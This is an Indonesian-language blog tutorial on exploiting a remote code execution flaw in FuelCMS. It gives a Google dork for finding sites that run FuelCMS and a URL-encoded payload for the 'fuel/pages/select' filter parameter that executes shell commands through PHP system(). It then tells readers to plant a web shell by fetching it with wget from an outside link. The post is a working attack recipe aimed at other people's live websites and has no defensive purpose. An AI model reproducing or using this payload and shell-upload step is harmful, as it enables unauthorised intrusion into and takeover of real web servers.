Recent Posts

    FuelCMS Remote Code Execution

    Assalamualaikum
    Say Hello Tod !



    sebelum memulai, alangkah baiknya kalian mengenal apa itu RCE

    Remote code execution (Bahasa Indonesia : Eksekusi kode jarak jauh) adalah kemampuan penyerang untuk mengakses perangkat komputasi orang lain dan membuat perubahan, di mana pun perangkat berbeda baik secara lokasi maupun geografis.
    Kerentanan dapat memberikan penyerang dengan kemampuan untuk mengeksekusi kode berbahaya dan mengambil kendali penuh dari sistem yang terkena dampak. Biasanya penyerang dapat mengakses dengan hak istimewa “user” saat menjalankan aplikasi. Setelah mendapatkan akses ke sistem, penyerang akan sering berusaha untuk meningkatkan hak istimewa mereka (dari user ke super user atau root ).

    Source : https://www.beritabebas.com/definisi/remote-code-execution-rce/


    oke, langsung saja kita Mulai, pertama kalian Dorking dulu :v

    ======================================
    Google Dork : intext:"FUEL CMS is developed with love by Daylight Studio © 2019 Daylight Studio LLC, All Rights Reserved."

    Payload : fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls -la%27%29%2b%27"
    ======================================





    Dorking Dolo..











    masukkan payloadnya

    Example : https://www.site.com/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27ls -la%27%29%2b%27"

    untuk command ls -la bisa kalian ubah2









     lalu View Source webnya,
    ntar bakalan muncul list dari isi web tsb. (ls -la)












    Jika ingin upload shell tinggal
     wget https://linkshell -O shell.php
    Akses Shell : site.com/shell.php








    Sekian tutor dari gw, semoga bermanfaat
    Bye...


    Wassalamualaikum

    0 Response to "FuelCMS Remote Code Execution"

    Post a Comment

    Iklan Atas Artikel

    Iklan Tengah Artikel 1

    Iklan Tengah Artikel 2

    Iklan Bawah Artikel